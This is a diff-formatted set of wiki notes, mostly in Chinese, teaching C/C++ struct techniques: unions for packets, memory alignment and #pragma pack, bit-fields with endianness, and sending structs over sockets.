||||
{
|
||||
int a;
|
||||
char b;
|
||||
};
|
||||
|
||||
|
||||
struct structB
|
||||
{
|
||||
char a;
|
||||
short b;
|
||||
};
|
||||
|
||||
|
||||
struct structC
|
||||
{
|
||||
int a;
|
||||
char b;
|
||||
float c;
|
||||
}
|
||||
|
||||
优秀的程序设计者这样设计传送的报文:
|
||||
|
||||
struct CommuPacket
|
||||
{
|
||||
int iPacketType; //报文类型标志
|
||||
union //每次传送的是三种报文中的一种,使用union
|
||||
{
|
||||
struct structA packetA;
|
||||
struct structB packetB;
|
||||
struct structC packetC;
|
||||
}
|
||||
};
|
||||
|
||||
在进行报文传送时,直接传送struct CommuPacket一个整体。
|
||||
|
||||
假设发送函数的原形如下:
|
||||
|
||||
// pSendData:发送字节流的首地址,iLen:要发送的长度
|
||||
|
||||
Send(char * pSendData, unsigned int iLen);
|
||||
|
||||
发送方可以直接进行如下调用发送struct CommuPacket的一个实例sendCommuPacket:
|
||||
|
||||
Send( (char *)&sendCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
假设接收函数的原形如下:
|
||||
|
||||
// pRecvData:发送字节流的首地址,iLen:要接收的长度
|
||||
|
||||
//返回值:实际接收到的字节数
|
||||
|
||||
unsigned int Recv(char * pRecvData, unsigned int iLen);
|
||||
|
||||
接收方可以直接进行如下调用将接收到的数据保存在struct CommuPacket的一个实例recvCommuPacket中:
|
||||
|
||||
Recv( (char *)&recvCommuPacket , sizeof(CommuPacket) );
|
||||
|
||||
It then checks the packet type and handles the packet accordingly:

switch(recvCommuPacket.iPacketType)
{
case PACKET_A:
    …    // handle a type A packet
    break;
case PACKET_B:
    …    // handle a type B packet
    break;
case PACKET_C:
    …    // handle a type C packet
    break;
}
|
||||
|
||||
The most notable thing in the code above is the __cast__ in

Send( (char *)&sendCommuPacket , sizeof(CommuPacket) );
Recv( (char *)&recvCommuPacket , sizeof(CommuPacket) );

namely (char *)&sendCommuPacket and (char *)&recvCommuPacket: take the address first, then convert it to a char pointer, so that functions that operate on byte streams can be used directly.

The same cast makes other code easier to write. For example, to zero the memory occupied by sendCommuPacket, call the standard library function memset() (the cast is optional here, because memset() takes a void *):

memset((char *)&sendCommuPacket,0, sizeof(CommuPacket));
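The packet design above can be sketched as a small, self-contained C program. This is only an illustration under assumptions: the tag values of PACKET_A/B/C, the union member name u, and the helper names fake_send and roundtrip_packet_c are hypothetical, and a plain memory copy stands in for the article's Send()/Recv().

```c
#include <assert.h>
#include <string.h>

/* Hypothetical tag values; the article only names PACKET_A/B/C. */
enum { PACKET_A = 1, PACKET_B = 2, PACKET_C = 3 };

struct structA { int a; char b; };
struct structB { char a; short b; };
struct structC { int a; char b; float c; };

struct CommuPacket {
    int iPacketType;              /* packet type tag */
    union {                       /* only one payload is valid at a time */
        struct structA packetA;
        struct structB packetB;
        struct structC packetC;
    } u;
};

/* Stand-in for Send(): copies the raw bytes into a caller-supplied "wire" buffer. */
unsigned int fake_send(unsigned char *wire, const void *data, unsigned int len)
{
    memcpy(wire, data, len);
    return len;
}

/* Builds a type C packet, "sends" it, "receives" it, and returns the decoded tag. */
int roundtrip_packet_c(float *c_out)
{
    unsigned char wire[sizeof(struct CommuPacket)];
    struct CommuPacket tx, rx;

    assert(c_out != NULL);
    memset(&tx, 0, sizeof tx);            /* zero the padding bytes as well */
    tx.iPacketType = PACKET_C;
    tx.u.packetC.a = 7;
    tx.u.packetC.b = 'x';
    tx.u.packetC.c = 1.5f;

    fake_send(wire, &tx, sizeof tx);
    memcpy(&rx, wire, sizeof rx);         /* receiver side */

    switch (rx.iPacketType) {
    case PACKET_C:
        *c_out = rx.u.packetC.c;          /* handle a type C packet */
        break;
    default:
        *c_out = 0.0f;
        break;
    }
    return rx.iPacketType;
}
```

Sending the raw bytes only works when both ends agree on the struct layout and byte order, which is exactly what the alignment sections that follow are about.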
|
||||
|
||||
===== 2. struct member alignment =====

Companies such as Intel and Microsoft have asked interview questions like this one:
|
||||
|
||||
1. #include <iostream>
2. #pragma pack(8)
3. struct example1
4. {
5. short a;
6. long b;
7. };

8. struct example2
9. {
10. char c;
11. example1 struct1;
12. short e;
13. };
14. #pragma pack()

15. int main(int argc, char* argv[])
16. {
17. example2 struct2;
18. std::cout << sizeof(example1) << std::endl;
19. std::cout << sizeof(example2) << std::endl;
20. std::cout << (char *)(&struct2.struct1) - (char *)(&struct2) << std::endl;
21. return 0;
22. }
|
||||
|
||||
What does the program print?

The answer (on a platform where long is 4 bytes, such as 32-bit Windows) is:

8
16
4

Not obvious? Let's go through it step by step.
|
||||
|
||||
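===== 2.1 Natural alignment =====

A struct is a composite data type whose elements can be variables of basic types (int, long, float, and so on) or of other composite types (arrays, structs, unions, and so on). **For structures, the compiler automatically aligns the member variables** to improve access efficiency. By default, the compiler allocates space for each member according to its **natural alignment**. Members are stored in memory in the order in which they are declared, and the address of the first member is the same as the address of the whole structure.

Natural alignment is the default: each member is placed at an offset that is a multiple of its own size, and **the structure as a whole is aligned to its largest member**, so its total size is rounded up to a multiple of that member's size.

For example:

struct naturalalign
{
    char a;
    short b;
    char c;
};

In this structure the largest member is the short, which is 2 bytes, so the structure is aligned to 2: a is at offset 0, b at offset 2 (after one padding byte), and c at offset 4, followed by one byte of tail padding. sizeof(naturalalign) is therefore 6.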
|
||||
|
||||
If it is changed to:

struct naturalalign
{
    char a;
    int b;
    char c;
};

the result is 12: a is at offset 0, b at offset 4, c at offset 8, and the size is rounded up to a multiple of 4.
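The two results can be checked with offsetof and sizeof. The sketch below assumes a mainstream ABI in which short is 2 bytes and int is 4 bytes; the names short_mid, int_mid, and padding_bytes are hypothetical (the article uses naturalalign for both structures).

```c
#include <assert.h>
#include <stddef.h>

struct short_mid { char a; short b; char c; };   /* expected size 6  */
struct int_mid   { char a; int   b; char c; };   /* expected size 12 */

/* Returns the number of padding bytes in a struct, given the sum of its member sizes. */
size_t padding_bytes(size_t struct_size, size_t member_total)
{
    assert(struct_size >= member_total);
    return struct_size - member_total;
}
```

For example, padding_bytes(sizeof(struct int_mid), 6) reports how much of the structure is padding rather than data.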
|
||||
|
||||
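===== 2.2 Specified alignment =====

In general, the default alignment can be changed as follows:

· the directive #pragma pack (n) makes the compiler align members on n-byte boundaries;
· the directive #pragma pack () cancels the custom alignment.

Note: if the n in #pragma pack (n) is larger than the size of the largest member of the structure, it has no effect, and the structure is still aligned to its largest member.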
|
||||
|
||||
For example:

#pragma pack (n)
struct naturalalign
{
    char a;
    int b;
    char c;
};
#pragma pack ()

When n is 4, 8, or 16, the layout is the same and sizeof(naturalalign) is 12. When n is 2, the directive takes effect and sizeof(naturalalign) becomes 8.
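A minimal sketch of this experiment, assuming a compiler that accepts #pragma pack (GCC, Clang, and MSVC do) and a 4-byte int. The struct names packed2/packed4/packed16 and the helper size_with_pack are made up for the illustration, since one translation unit cannot redefine naturalalign three times.

```c
#include <assert.h>
#include <stddef.h>

#pragma pack(2)
struct packed2 { char a; int b; char c; };    /* b moves to offset 2 */
#pragma pack()

#pragma pack(4)
struct packed4 { char a; int b; char c; };    /* same as the default layout */
#pragma pack()

#pragma pack(16)
struct packed16 { char a; int b; char c; };   /* n larger than any member: no effect */
#pragma pack()

/* Returns sizeof for the variant compiled with #pragma pack(n); 0 for other n. */
size_t size_with_pack(int n)
{
    switch (n) {
    case 2:  return sizeof(struct packed2);
    case 4:  return sizeof(struct packed4);
    case 16: return sizeof(struct packed16);
    default: return 0;
    }
}
```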
|
||||
|
||||
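In VC++ 6.0 the alignment can also be set in the IDE (see Figure 1): choose Project > Settings > C/C++ and pick the desired value under Struct member alignment.

Figure 1: Specifying the alignment in VC++ 6.0

In addition, __attribute__((aligned (n))) aligns the struct member it is applied to on an n-byte boundary, but it is used less often, so it is not covered in detail here.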
|
||||
|
||||
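===== 2.3 Answering the interview question =====

We can now answer the interview question in full.

Line 2, #pragma pack (8), specifies 8-byte alignment, but the largest member of struct example1 is 4 bytes (a long is 4 bytes here), so struct example1 is still aligned to 4 bytes and its size is 8, which is the output of line 18.

struct example2 contains struct example1. Its own simple members are at most 2 bytes (the short e), but because it contains struct example1, whose largest member is 4 bytes, struct example2 must also be aligned to 4. The #pragma pack (8) has no effect on struct example2 either, so line 19 prints 16.

Because struct1 must start on a 4-byte boundary, the char c is followed by __3 padding bytes__ before the storage for struct1 begins, so line 20 prints 4.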
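The same analysis can be reproduced in plain C. This sketch makes one deliberate substitution: int32_t replaces long so that the member is 4 bytes on every platform (on 64-bit Linux a long is 8 bytes and the original program prints different numbers). The helper struct1_offset is a hypothetical name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#pragma pack(8)
struct example1 { short a; int32_t b; };    /* int32_t stands in for a 4-byte long */
struct example2 { char c; struct example1 struct1; short e; };
#pragma pack()

/* Offset of struct1 inside example2: c plus 3 padding bytes. */
size_t struct1_offset(void)
{
    return offsetof(struct example2, struct1);
}
```

Using offsetof avoids casting pointers to integers, which is what line 20 of the original question relies on.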
|
||||
|
||||
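===== 3. Deeper differences between struct in C and C++ =====

In C++, struct has the capabilities of a class. It differs from the class keyword in that the member variables and functions of a struct are public by default, whereas those of a class are private.

For example, define a struct and a class: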
|
||||
|
||||
struct structA
{
    char a;
    …
};

class classB
{
    char a;
    …
};

Then:

structA a;
a.a = 'a';    // accesses a public member: legal

classB b;
b.a = 'a';    // accesses a private member: illegal
|
||||
|
||||
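Many references stop here and consider the differences between struct and class in C++ fully covered. That is not the whole story. Another point worth noting:

__struct in C++ remains fully compatible with struct in C__ (in line with the original intent of C++ as "a better C"), so the following is legal:

// define the struct
struct structA
{
    char a;
    char b;
    int c;
};
structA a = {'a' , 'a' ,1};    // initialize at the point of definition

That is, a struct can have its members initialized with { } where it is defined, while a class whose members are private by default cannot. The author of the classic Thinking in C++, 2nd Edition emphasizes this point.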
|
||||
|
||||
===== 4. Things to watch for when programming with struct =====

Consider the following program:
|
||||
|
||||
1. #include <iostream>
2. struct structA
3. {
4. int iMember;
5. char *cMember;
6. };

7. int main(int argc, char* argv[])
8. {
9. structA instant1,instant2;
10. char c = 'a';
11. instant1.iMember = 1;
12. instant1.cMember = &c;
13. instant2 = instant1;
14. std::cout << *(instant1.cMember) << std::endl;
15. *(instant2.cMember) = 'b';
16. std::cout << *(instant1.cMember) << std::endl;
17. return 0;
18. }
|
||||
|
||||
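Line 14 prints: a
Line 16 prints: b

Why? The modification made through instant2 on line 15 changed the value seen through instant1!

The reason is that the assignment __instant2 = instant1 on line 13 copies the members one by one__ (a shallow copy), so the cMember pointers in instant1 and instant2 point to the same memory. Modifying the data through instant2 therefore modifies it for instant1 as well.

In C, whenever a structure has pointer members, check whether an assignment leaves the pointer members of the two instances pointing to the same memory.

In C++, when a structure has pointer members, we need to write a copy constructor for the struct and overload the "=" operator.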
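In C, the usual way around the shared pointer is an explicit deep-copy function. The sketch below is one possible shape, not the article's code: the type text_item and the functions text_item_copy, text_item_free, and first_char_after_copy_edit are hypothetical, and the pointer member is assumed to own a heap-allocated string.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

struct text_item {
    int   iMember;
    char *cMember;   /* owned, heap-allocated string */
};

/* Copies src into dst, duplicating the string so the two items do not share memory.
   Returns 0 on success, -1 if allocation fails. */
int text_item_copy(struct text_item *dst, const struct text_item *src)
{
    size_t len = strlen(src->cMember) + 1;
    char *copy = malloc(len);
    if (copy == NULL)
        return -1;
    memcpy(copy, src->cMember, len);
    dst->iMember = src->iMember;
    dst->cMember = copy;
    return 0;
}

void text_item_free(struct text_item *item)
{
    free(item->cMember);
    item->cMember = NULL;
}

/* Demo: after a deep copy, editing the copy leaves the original untouched. */
char first_char_after_copy_edit(void)
{
    struct text_item a = { 1, NULL }, b;
    char result;

    a.cMember = malloc(2);
    assert(a.cMember != NULL);
    strcpy(a.cMember, "a");
    if (text_item_copy(&b, &a) != 0) {
        text_item_free(&a);
        return '\0';
    }
    b.cMember[0] = 'b';          /* modifies only b's private copy */
    result = a.cMember[0];       /* still 'a' */
    text_item_free(&a);
    text_item_free(&b);
    return result;
}
```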
|
||||
|
||||
|
||||
没有 wrote:
16 June 2006 @ 3:49 pm

The size also seems to depend on the order of the members. For example, the size of

struct naturalalign
{
    char a;
    int b;
    char c;
};

is different from the size of

struct naturalalign
{
    char a;
    char c;
    int b;
};
|
||||
|
||||
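yoghurt wrote:
29 September 2006 @ 2:12 pm

I have reservations about using struct this way. With different compilers on different platforms, the alignment and internal layout of an identically declared struct may differ, especially when certain optimization options are turned on. So the program above may produce errors on the receiving side.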
|
||||
宋宝华 wrote:
24 October 2006 @ 11:13 pm

You are all right. This article is about how struct encapsulates data, so it does not dwell on struct alignment. I discuss struct alignment specifically in a separate article.
|
||||
@@ -0,0 +1,99 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:44:52+08:00
|
||||
|
||||
====== An advanced feature of C/C++ structs: specifying the bit width of members ======
Created Saturday 04 June 2011
|
||||
|
||||
宋宝华 21cnbao@21cn.com sweek
|
||||
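In most cases we define a structure like this:

struct student
{
    unsigned int sex;
    unsigned int age;
};

For ordinary applications this is quite enough to "encapsulate" the data.

In real projects, however, we often need **different bits of one basic-type variable to carry different meanings**. Take a CPU's internal flag register, say 16 bits wide, in which each bit has its own meaning: one indicates whether the result is zero, another indicates overflow, and so on. What data structure should represent this register?

The answer is still a structure!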
|
||||
|
||||
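To do this we use an advanced feature of structures: append

: number of bits

after a basic member to form a new structure:

struct xxx
{
    member1_type member1 : member1_bits;
    member2_type member2 : member2_bits;
    member3_type member3 : member3_bits;
};

The basic member variable is thereby split up. This syntax (bit-fields) is rarely used in introductory programming, but it comes up again and again in advanced code.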
|
||||
For example:

struct student
{
    unsigned int sex : 1;
    unsigned int age : 15;
};

The two members sex and age together occupy only one unsigned int (assuming unsigned int is 16 bits).

After the split, the members are accessed exactly as they would be without it, for example:

struct student sweek;
sweek.sex = MALE;
sweek.age = 20;
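A small sketch of the bit-field version of student in use. The values of FEMALE and MALE and the helper make_student are assumptions for the illustration; the article only names MALE. On compilers where unsigned int is 32 bits, the two fields still share a single unsigned int, with the remaining 16 bits unused.

```c
#include <assert.h>

enum { FEMALE = 0, MALE = 1 };   /* hypothetical values */

struct student {
    unsigned int sex : 1;
    unsigned int age : 15;
};

/* Builds a student; values too large for a field are reduced modulo 2^width,
   as for any unsigned bit-field. */
struct student make_student(unsigned int sex, unsigned int age)
{
    struct student s;
    s.sex = sex;
    s.age = age;
    assert(s.age <= 32767u);     /* a 15-bit field can never exceed 2^15 - 1 */
    return s;
}
```

Note that the address-of operator cannot be applied to a bit-field, so fields like sex and age can only be read and written by name.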
|
||||
|
||||
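Although the syntax permits splitting a basic member, that does not mean any split is a good idea. The following split, for example, is poorly chosen:

struct student
{
    unsigned int sex : 1;
    unsigned int age : 12;
};

Here 1 + 12 = 13 bits, which do not add up to a whole basic member: __they fill neither a char nor an int nor any other type__. The code still compiles, but the compiler pads out the rest of the storage unit, so the leftover bits are wasted and the design does not hold together.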
|
||||
|
||||
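When splitting a basic member into bit-fields, pay particular attention to the order in which the data is stored, which depends on whether the CPU is big-endian or little-endian (the C standard leaves the order of bit-fields to the implementation, and compilers generally follow the byte order of the target). Little-endian and big-endian are two different orders in which a CPU stores data. For types such as int and long, big-endian treats the first byte as the most significant byte (from low address to high address, bytes are stored from most significant to least significant), while little-endian does the opposite and treats the first byte as the least significant byte (from low address to high address, bytes are stored from least significant to most significant).

We define the IP header structure as: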
|
||||
struct iphdr {
|
||||
#if defined(__LITTLE_ENDIAN_BITFIELD)
|
||||
__u8 ihl:4,
|
||||
version:4;
|
||||
#elif defined (__BIG_ENDIAN_BITFIELD)
|
||||
__u8 version:4,
|
||||
ihl:4;
|
||||
#else
|
||||
#error "Please fix <asm/byteorder.h>"
|
||||
#endif
|
||||
__u8 tos;
|
||||
__u16 tot_len;
|
||||
__u16 id;
|
||||
__u16 frag_off;
|
||||
__u8 ttl;
|
||||
__u8 protocol;
|
||||
__u16 check;
|
||||
__u32 saddr;
|
||||
__u32 daddr;
|
||||
/*The options start here. */
|
||||
};
|
||||
In little-endian mode, the iphdr definition

__u8 ihl:4,
version:4;

is stored as:

low 4 bits of byte 1: ihl
high 4 bits of byte 1: version (the IP version number)

If the same definition were used in big-endian mode, the storage would be:

low 4 bits of byte 1: version (the IP version number)
high 4 bits of byte 1: ihl

This does not match the actual IP protocol, so the definition of the IP header structure in the Linux kernel source uses the macros

#if defined(__LITTLE_ENDIAN_BITFIELD)
…
#elif defined (__BIG_ENDIAN_BITFIELD)
…
#endif

to distinguish the two cases.
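When bit-field order is a concern, a common alternative is to avoid bit-fields for wire formats and extract the two nibbles with shifts and masks, which behaves the same on either byte order. The sketch below shows that alternative technique, not the kernel's approach; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* First byte of an IPv4 header: version in the high nibble, IHL in the low nibble. */
unsigned int ip_version(uint8_t first_byte)
{
    return first_byte >> 4;
}

unsigned int ip_header_words(uint8_t first_byte)
{
    return first_byte & 0x0Fu;
}

/* Builds the first header byte from its two 4-bit fields. */
uint8_t ip_first_byte(unsigned int version, unsigned int ihl)
{
    assert(version <= 15u && ihl <= 15u);
    return (uint8_t)((version << 4) | ihl);
}
```

A typical IPv4 header without options starts with the byte 0x45: version 4 and a header length of 5 32-bit words.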
|
||||
|
||||
|
||||
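To summarize the main points of this article:

(1) C/C++ structures support splitting a basic member variable into bit-fields;
(2) the bit widths should be chosen sensibly, so that together they still make up a whole basic member;
(3) pay particular attention to the storage order of the split data, which depends on the architecture of the specific CPU.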
|
||||
|
||||
88
Zim/Programme/APUE/C&C+语言struct深层探索/C语言:内存字节对齐详解.txt
Normal file
@@ -0,0 +1,88 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T13:29:51+08:00
|
||||
|
||||
====== C: byte alignment in memory explained ======
Created Sunday 05 June 2011
Source: http://hi.baidu.com/jjpro/blog/item/06ea380859eac433e82488f8.html
|
||||
|
||||
|
||||
|
||||
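===== 1. What alignment is and why it is needed =====

1. Memory in modern computers is divided into bytes. In theory, a variable of any type could be accessed starting at any address; in practice, variables of a given type can often be accessed only at __particular memory addresses__. Data of each type must therefore be laid out in memory according to certain rules rather than packed one after another with no gaps. This is alignment.

2. Why alignment matters: hardware platforms differ greatly in how they handle memory. Some platforms can access certain types of data only at certain addresses. Others have no such restriction, but most commonly, data that is not aligned as the platform prefers __costs access efficiency__. For example, some platforms always start a read at an even address. If an int (assume 32 bits) is stored starting at an even address, one read cycle fetches it; if it starts at an odd address, it may take two read cycles, and the high and low bytes of the two results must be pieced together to obtain the int. Read efficiency clearly drops a great deal. This is a trade-off between space and time.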
|
||||
|
||||
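===== 2. How alignment is implemented =====

Normally we do not need to think about alignment when writing programs; the compiler chooses an alignment strategy suited to the target platform. We can also change the alignment of particular data by giving the compiler a preprocessing directive.

However, precisely because we usually do not have to care, the alignment the compiler applies can be puzzling when we are unaware of it. The most common surprise is the __sizeof__ of a struct. To make sense of it, we need to understand the alignment algorithm.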
|
||||
|
||||
==== The alignment algorithm ====

Because platforms and compilers differ, the discussion below uses the author's gcc version 3.2.2 (32-bit x86) as the example of how a compiler aligns the members of a struct.

Define a structure as follows:

struct A {
    int a;
    char b;
    short c;
};

Structure A contains a 4-byte int, a 1-byte char, and a 2-byte short, so it would seem to need 7 bytes. But because the compiler aligns the members in memory, sizeof(struct A) is __8__.
|
||||
|
||||
Now reorder the members of the structure.

struct B {
    char b;
    int a;
    short c;
};

The members still total 7 bytes, but sizeof(struct B) is now __12__.
|
||||
|
||||
Next we use the directive #pragma pack (value) to tell the compiler to use our alignment value instead of the default.

#pragma pack (2) /* align on 2-byte boundaries */
struct C {
    char b;
    int a;
    short c;
};
#pragma pack () /* cancel the specified alignment and restore the default */

sizeof(struct C) is 8.
|
||||
|
||||
Change the alignment value to 1:

#pragma pack (1) /* align on 1-byte boundaries */
struct D {
    char b;
    int a;
    short c;
};
#pragma pack () /* cancel the specified alignment and restore the default */

sizeof(struct D) is 7.
|
||||
|
||||
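For char the natural alignment value is 1, for short it is 2, and for int, float, and double it is 4 (in bytes, on this platform).

There are __four concepts__ involved:

1) Natural alignment of a data type: the per-type values just listed.
2) Specified alignment: the value given in #pragma pack (value).
3) Natural alignment of a struct or class: the largest natural alignment among its members.
4) __Effective alignment__ of a data member, struct, or class: the smaller of its natural alignment and the specified alignment.

With these values we can easily discuss how the members of a data structure, and the structure itself, are aligned. The effective alignment N is what finally decides where data is placed, so it is the most important. "Aligned on N" means that the data's "__start address % N = 0__". The members of a data structure are laid out **in the order in which they are defined**, and the start address of the first member is **the start address of the structure**. The members must be aligned, and **the structure itself** must also be rounded up according to its own effective alignment (that is, the total size occupied by the structure must be a multiple of its effective alignment; see the examples below). With that, the results above are easy to understand.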
|
||||
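Worked examples:

Example B:

struct B {
    char b;
    int a;
    short c;
};

Assume B is placed starting at address 0x0000. No alignment value is specified in this example; in the author's environment it **defaults to 4**. The first member b has natural alignment 1, smaller than the specified (default) value 4, so its effective alignment is 1, and its address 0x0000 satisfies 0x0000 % 1 = 0. The second member a has natural alignment 4, so its effective alignment is also 4, and it can only occupy the four consecutive bytes 0x0004 to 0x0007, which satisfies 0x0004 % 4 = 0 and is as close as possible to the first member. The third member c has natural alignment 2, so its effective alignment is 2, and it occupies the two bytes 0x0008 to 0x0009, satisfying 0x0008 % 2 = 0. So 0x0000 through 0x0009 hold the contents of B. The natural alignment of structure B is the largest alignment among its members (here, that of a), which is 4, so **the effective alignment of the structure is also 4**. By the rounding rule, 0x0000 through 0x0009 is 10 bytes, and (10 + 2) % 4 = 0, so 0x000A and 0x000B are occupied by B as well. B therefore spans 0x0000 to 0x000B, 12 bytes in total: sizeof(struct B) = 12.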
|
||||
|
||||
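Example C can be analyzed in the same way:

#pragma pack (2) /* align on 2-byte boundaries */
struct C {
    char b;
    int a;
    short c;
};
#pragma pack () /* cancel the specified alignment and restore the default */

The first member b has natural alignment 1 and the specified alignment is 2, so its effective alignment is 1. Assuming C starts at 0x0000, b is stored at 0x0000, which satisfies 0x0000 % 1 = 0. The second member a has natural alignment 4 and specified alignment 2, so its effective alignment is 2, and it occupies the four consecutive bytes 0x0002 through 0x0005, satisfying 0x0002 % 2 = 0. The third member c has natural alignment 2, so its effective alignment is 2, and it is stored at 0x0006 and 0x0007, satisfying 0x0006 % 2 = 0. So the eight bytes from 0x0000 to 0x0007 hold the members of C. The natural alignment of C is 4, so its effective alignment is 2. Since 8 % 2 = 0, C occupies exactly the eight bytes 0x0000 to 0x0007, and sizeof(struct C) = 8.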
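The four-value rule above is mechanical enough to write down as a function. The following sketch computes member offsets and the final size from each member's size, its natural alignment, and the pack value. It is an illustration of the rule as this article states it, not a description of any particular compiler's internals; struct member, struct_size, size_of_a, and size_of_bcd are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

struct member { size_t size; size_t align; };   /* size and natural alignment of one member */

static size_t min_sz(size_t a, size_t b) { return a < b ? a : b; }
static size_t round_up(size_t n, size_t align) { return (n + align - 1) / align * align; }

/* Computes sizeof for a struct with the given members under #pragma pack(pack).
   If offsets is non-NULL, the offset of each member is stored there. */
size_t struct_size(const struct member *m, size_t count, size_t pack, size_t *offsets)
{
    size_t offset = 0, struct_align = 1, i;

    assert(pack > 0);
    for (i = 0; i < count; i++) {
        size_t eff = min_sz(m[i].align, pack);   /* effective alignment of the member */
        offset = round_up(offset, eff);          /* padding before the member */
        if (offsets != NULL)
            offsets[i] = offset;
        offset += m[i].size;
        if (eff > struct_align)
            struct_align = eff;                  /* effective alignment of the struct */
    }
    return round_up(offset, struct_align);       /* tail padding */
}

/* struct A from the article: int a; char b; short c; */
size_t size_of_a(size_t pack)
{
    const struct member m[] = { {4, 4}, {1, 1}, {2, 2} };
    return struct_size(m, 3, pack, NULL);
}

/* structs B, C and D from the article: char b; int a; short c; */
size_t size_of_bcd(size_t pack)
{
    const struct member m[] = { {1, 1}, {4, 4}, {2, 2} };
    return struct_size(m, 3, pack, NULL);
}
```

With a pack value of 4 (the default assumed in the article), 2, and 1, size_of_bcd reproduces the sizes quoted for B, C, and D.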
|
||||
|
||||
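With the explanation above, the concept of byte alignment in C should now be clear. It matters a great deal in network programs: when a binary stream (such as a structure) is passed between different platforms (for example, between Windows and Linux), __both platforms must use the same alignment__; otherwise baffling errors appear that are very hard to track down.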
|
||||
57
Zim/Programme/APUE/C&C+语言struct深层探索/Struct_packing.txt
Normal file
@@ -0,0 +1,57 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:09:55+08:00
|
||||
|
||||
====== Struct packing ======
|
||||
Created Sunday 05 June 2011
|
||||
http://tedlogan.com/techblog2.html
|
||||
|
||||
Last week, I was debugging some code and came across a troubling situation: A variable that I set in one function was suddenly and quickly being mutilated before I managed to read it in another function. After hours at the debugger, I discovered the culprit was struct packing.
|
||||
|
||||
To understand what struct packing means, let's start with an arbitrary C struct:
|
||||
struct example_struct {
|
||||
char my_char;
|
||||
short my_short;
|
||||
int my_int;
|
||||
};
|
||||
|
||||
Let's play compiler and try to lay out this structure in memory. Assume that char is one byte, short is two bytes, and int is four bytes, and that we can ignore byte ordering. Our first attempt will be to use as little memory as possible:
|
||||
|
||||
Address   0         1-2        3-6
Data      my_char   my_short   my_int
|
||||
|
||||
That's it; our struct takes 7 bytes in memory. That's great, right?
|
||||
|
||||
Well, not really. Modern 32-bit computers like to access data in 32-bit chunks, and more importantly, they like the data to be aligned in multiples of 32 bits. (You may correctly extrapolate that 64-bit systems like to access data in 64-bit chunks and like these chunks to be aligned in multiples of 64 bits.) What this means is that the structure we laid out above will probably be less efficient to access than it could be. So let's make another attempt:
|
||||
|
||||
Address   0         1-3         4-5        6-7         8-11
Data      my_char   (padding)   my_short   (padding)   my_int
|
||||
|
||||
Wait! Isn't that horribly wasteful of memory? We use twelve bytes to store seven bytes of data. Well, yes, but that's not important. Here's a secret:
|
||||
|
||||
Modern computers have gobs and gobs of main memory.
|
||||
|
||||
You may not be aware that "gobs" is the technical term for "gigabytes upon gigabytes". The point is that, unless you're writing code for an embedded system or for One Laptop per Child, you're not going to run out of memory by "wasting" space inside your structs.
|
||||
|
||||
Ok, so now you're asking what the point is. After all, we went off on this tangent because of a real-world problem. Take a look at the two ways we came up to arrange the structures, and imagine what happens if some code tried to use the first arrangement to read the struct while the code that wrote the structure used the second arrangement. Chaos would ensue -- the second and third elements in the struct have different addresses, so the code will read bogus values. That was the problem I saw. But what caused it, and how could I fix it?
|
||||
|
||||
It turns out that compilers allow their users to manipulate struct packing, which may come in handy if you're trying to ensure that two pieces of code compiled at different times agree on the structure packing. The two compilers I've used in the past year, gcc and Microsoft Visual C++, support the same notation, where N is a small power of two which specifies the new alignment in bytes:
|
||||
|
||||
#pragma pack(N) simply sets the new alignment.
|
||||
#pragma pack() sets the alignment to the one that was in effect when compilation started.
|
||||
#pragma pack(push[,N]) pushes the current alignment setting on an internal stack and then optionally sets the new alignment.
|
||||
#pragma pack(pop) restores the alignment setting to the one saved at the top of the internal stack (and removes that stack entry).
|
||||
|
||||
(Text from the GCC manual.)
|
||||
|
||||
GCC will generate code using the first structure packing above if one includes the following line in the code before the structure is declared:
|
||||
#pragma pack(1)
|
||||
|
||||
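GCC will use an aligned layout if the following pragma is used. (Strictly speaking, the twelve-byte picture above is a simplification: with a 4-byte packing limit a short only needs 2-byte alignment, so GCC places my_short at offset 2 and my_int at offset 4, for a total of 8 bytes.)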
|
||||
#pragma pack(4)
|
||||
|
||||
In my situation, the problem was that a header file felt the need to change the struct packing without changing it at the end of the header, and not all of my source files were including the offending header. I filed a bug report and protected myself from the header with this code:
|
||||
#pragma pack(push)
|
||||
#include "evil-header.h"
|
||||
#pragma pack(pop)
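The push/pop pattern can be seen in isolation in the sketch below, which assumes GCC, Clang, or MSVC and the usual sizes (char 1, short 2, int 4). The struct and function names are made up for the illustration.

```c
#include <assert.h>
#include <stddef.h>

#pragma pack(push, 1)          /* save the current setting, then pack tightly */
struct wire_example {
    char  my_char;
    short my_short;
    int   my_int;
};
#pragma pack(pop)              /* restore whatever was in effect before */

struct native_example {        /* declared after the pop: default alignment again */
    char  my_char;
    short my_short;
    int   my_int;
};

/* Number of padding bytes the default layout adds compared with the packed one. */
size_t packing_overhead(void)
{
    return sizeof(struct native_example) - sizeof(struct wire_example);
}
```

Wrapping the packed declaration in push and pop keeps the setting from leaking into code that follows, which is the failure the header in the story caused.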
|
||||
|
||||
51
Zim/Programme/APUE/C&C+语言struct深层探索/cc++通过socket发送结构体.txt
Normal file
@@ -0,0 +1,51 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T14:55:37+08:00
|
||||
|
||||
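====== Sending a struct over a socket in C/C++ ======
Created Sunday 05 June 2011

In C/C++, a struct can be sent over a socket by treating its in-memory representation as a byte buffer and passing it straight to send.

Network communication often involves passing related parameters together, such as arrays or structures. For structures the method is quite simple: because a struct object occupies contiguous memory, the whole struct can be sent as a byte stream, and the receiver can turn that byte stream back into a struct.

First, define a structure.

struct UsrData{
    char usr_id[16];
    char usr_pwd[16];
    char usr_nickname[16];
};

Of course, this structure must be declared on both the sender and the receiver.

Next, create an object, initialize it, and send it.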
|
||||
|
||||
UsrData sendUser;
memcpy( sendUser.usr_id, "100001", sizeof("100001") );
memcpy( sendUser.usr_pwd, "123456", sizeof("123456") );
memcpy( sendUser.usr_nickname, "Rock", sizeof("Rock") );
send( m_socket, (char *)&sendUser, sizeof(UsrData), 0 );

The sender has now sent the sendUser object as a byte stream.
|
||||
|
||||
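Finally, receive it on the receiving side.

char buffer[1024];
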